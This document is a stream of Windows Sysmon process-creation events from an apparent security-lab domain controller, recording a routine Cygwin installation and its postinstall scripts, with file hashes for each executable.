14:56:02.144{A8622C2F-5402-6078-FA0B-00000000AE01}5144C:\cygwin64\bin\rm.exe-----"C:\cygwin64\bin\rm.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3A51D241547A83A7D680C1AAA6025CA2,SHA256=CA37C7AF9FB52FE23369A60B2371D06A67F2D943BA1C5AD551283055C2E2AC97,IMPHASH=0CB408B71E8CFCA4B8930235B85446CC{A8622C2F-5402-6078-F90B-00000000AE01}928C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056617Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.136{A8622C2F-5402-6078-F90B-00000000AE01}928C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056607Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.127{A8622C2F-5402-6078-F80B-00000000AE01}1628C:\cygwin64\bin\ls.exe-----"C:\cygwin64\bin\ls.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=78510505DCF9B8AE9DB2A9E1D1E8107D,SHA256=68A3C434F639779FF71DFCD1A3DCE94C5D3CC1D8FFA4FC090D5E3140613C0BBF,IMPHASH=5F433535F19619074E0B3EBD48586FD5{A8622C2F-5402-6078-F70B-00000000AE01}4604C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056597Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:02.119{A8622C2F-5402-6078-F70B-00000000AE01}4604C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-F60B-00000000AE01}6084C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056587Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.110{A8622C2F-5402-6078-F60B-00000000AE01}6084C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056575Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.102{A8622C2F-5402-6078-F50B-00000000AE01}6748C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-5402-6078-F40B-00000000AE01}6448C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056565Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:02.093{A8622C2F-5402-6078-F40B-00000000AE01}6448C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-F20B-00000000AE01}2664C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056555Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.085{A8622C2F-5402-6078-F30B-00000000AE01}4288C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-F20B-00000000AE01}2664C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056543Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.077{A8622C2F-5402-6078-F20B-00000000AE01}2664C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056531Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:02.068{A8622C2F-5402-6078-F10B-00000000AE01}1100C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-5402-6078-F00B-00000000AE01}1028C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056521Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.060{A8622C2F-5402-6078-F00B-00000000AE01}1028C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-EE0B-00000000AE01}5904C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056511Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.052{A8622C2F-5402-6078-EF0B-00000000AE01}6336C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-EE0B-00000000AE01}5904C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056499Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:02.044{A8622C2F-5402-6078-EE0B-00000000AE01}5904C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056487Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.035{A8622C2F-5402-6078-ED0B-00000000AE01}5852C:\cygwin64\bin\basename.exe-----"C:\cygwin64\bin\basename.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=AED8AC1AB11AAE8C1D7419413A62D44D,SHA256=AC27DE64030ACA88AFC06227567D12364AF0B121C0A47F04D549BFA03D0B6E96,IMPHASH=1FC5FB16CA0D89F0C4AB3D25E6FD9B83{A8622C2F-5402-6078-EC0B-00000000AE01}5344C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056477Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.026{A8622C2F-5402-6078-EC0B-00000000AE01}5344C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056465Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:02.017{A8622C2F-5402-6078-EB0B-00000000AE01}3156C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-5402-6078-EA0B-00000000AE01}1496C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056455Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.008{A8622C2F-5402-6078-EA0B-00000000AE01}1496C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-E80B-00000000AE01}6552C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056445Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.000{A8622C2F-5402-6078-E90B-00000000AE01}3008C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-E80B-00000000AE01}6552C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056433Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:01.992{A8622C2F-5401-6078-E80B-00000000AE01}6552C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056421Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.984{A8622C2F-5401-6078-E70B-00000000AE01}6440C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-5401-6078-E50B-00000000AE01}4604C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056406Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.976{A8622C2F-5401-6078-E60B-00000000AE01}6084C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-5401-6078-E40B-00000000AE01}6748C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056401Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:01.975{A8622C2F-5401-6078-E50B-00000000AE01}4604C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-E30B-00000000AE01}4336C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056391Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.967{A8622C2F-5401-6078-E40B-00000000AE01}6748C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-E30B-00000000AE01}4336C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056379Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.959{A8622C2F-5401-6078-E30B-00000000AE01}4336C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056367Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:01.951{A8622C2F-5401-6078-E20B-00000000AE01}5744C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5401-6078-E10B-00000000AE01}6332C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056357Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.942{A8622C2F-5401-6078-E10B-00000000AE01}6332C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056347Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.934{A8622C2F-5401-6078-E00B-00000000AE01}5996C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5401-6078-DF0B-00000000AE01}2084C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056337Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:01.926{A8622C2F-5401-6078-DF0B-00000000AE01}2084C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056327Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.910{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DD0B-00000000AE01}1612C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/crypto-policies.sh" 154100x800000000000000056317Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.902{A8622C2F-5401-6078-DD0B-00000000AE01}1612C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/crypto-policies.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-D70B-00000000AE01}4860C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/crypto-policies.sh" 154100x800000000000000056306Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:01.893{A8622C2F-5401-6078-DC0B-00000000AE01}2408C:\cygwin64\bin\cp.exe-----"C:\cygwin64\bin\cp.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D65A875D91ECD4B5C0AB5E9D756E7627,SHA256=0572CDC8657D5F58423216D9E8EFA613EE22633571B6CEC7689888AE1A1D194F,IMPHASH=B3F0A23F2646ADA5A25EDB28C3DCB675{A8622C2F-5401-6078-DB0B-00000000AE01}6700C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/crypto-policies.sh" 154100x800000000000000056296Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.885{A8622C2F-5401-6078-DB0B-00000000AE01}6700C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/crypto-policies.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-D70B-00000000AE01}4860C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/crypto-policies.sh" 154100x800000000000000056285Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.877{A8622C2F-5401-6078-DA0B-00000000AE01}6556C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5401-6078-D90B-00000000AE01}5084C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/crypto-policies.sh" 154100x800000000000000056275Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.868{A8622C2F-5401-6078-D90B-00000000AE01}5084C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile 
"/etc/postinstall/crypto-policies.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-D70B-00000000AE01}4860C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/crypto-policies.sh" 154100x800000000000000056259Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.816{A8622C2F-5401-6078-D70B-00000000AE01}4860C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/crypto-policies.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53AA-6078-B907-00000000AE01}4420C:\Users\Administrator\Downloads\setup-x86_64.exe"C:\Users\Administrator\Downloads\setup-x86_64.exe" 154100x800000000000000056248Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.698{A8622C2F-5401-6078-D60B-00000000AE01}5108C:\cygwin64\bin\trust.exe-----"C:\cygwin64\bin\trust.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8DDBACD5081ABDAD4382B262BF82C15A,SHA256=5A88BB0A91506D24DE68EDC9F3E394EC686FBA0F0099425996CBDAB12953F446,IMPHASH=65914CDD7DF81669EB24F872C1794FED{A8622C2F-5401-6078-D50B-00000000AE01}1156C:\cygwin64\bin\p11-kit.exe"C:\cygwin64\bin\p11-kit.exe" 154100x800000000000000056238Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:01.689{A8622C2F-5401-6078-D50B-00000000AE01}1156C:\cygwin64\bin\p11-kit.exe-----"C:\cygwin64\bin\p11-kit.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=4DCD68BAF000AD8F19FAE2B19DDE1999,SHA256=4AEFE8637AFE985529126AB69FDB634205C8E7B7C40FA882A50752C9D1430521,IMPHASH=2B32226A1CA6BD394F0E95BE7A61431E{A8622C2F-5401-6078-D40B-00000000AE01}3912C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000056228Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.681{A8622C2F-5401-6078-D40B-00000000AE01}3912C:\cygwin64\bin\sh.exe-----"C:\cygwin64\bin\sh.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-C40B-00000000AE01}6196C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000056218Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.568{A8622C2F-5401-6078-D30B-00000000AE01}6748C:\cygwin64\bin\trust.exe-----"C:\cygwin64\bin\trust.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8DDBACD5081ABDAD4382B262BF82C15A,SHA256=5A88BB0A91506D24DE68EDC9F3E394EC686FBA0F0099425996CBDAB12953F446,IMPHASH=65914CDD7DF81669EB24F872C1794FED{A8622C2F-5401-6078-D20B-00000000AE01}1408C:\cygwin64\bin\p11-kit.exe"C:\cygwin64\bin\p11-kit.exe" 154100x800000000000000056208Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:01.560{A8622C2F-5401-6078-D20B-00000000AE01}1408C:\cygwin64\bin\p11-kit.exe-----"C:\cygwin64\bin\p11-kit.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=4DCD68BAF000AD8F19FAE2B19DDE1999,SHA256=4AEFE8637AFE985529126AB69FDB634205C8E7B7C40FA882A50752C9D1430521,IMPHASH=2B32226A1CA6BD394F0E95BE7A61431E{A8622C2F-5401-6078-D10B-00000000AE01}6672C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000056198Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.551{A8622C2F-5401-6078-D10B-00000000AE01}6672C:\cygwin64\bin\sh.exe-----"C:\cygwin64\bin\sh.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-C40B-00000000AE01}6196C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000056188Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.439{A8622C2F-5401-6078-D00B-00000000AE01}6332C:\cygwin64\bin\trust.exe-----"C:\cygwin64\bin\trust.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8DDBACD5081ABDAD4382B262BF82C15A,SHA256=5A88BB0A91506D24DE68EDC9F3E394EC686FBA0F0099425996CBDAB12953F446,IMPHASH=65914CDD7DF81669EB24F872C1794FED{A8622C2F-5401-6078-CF0B-00000000AE01}1736C:\cygwin64\bin\p11-kit.exe"C:\cygwin64\bin\p11-kit.exe" 154100x800000000000000056178Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
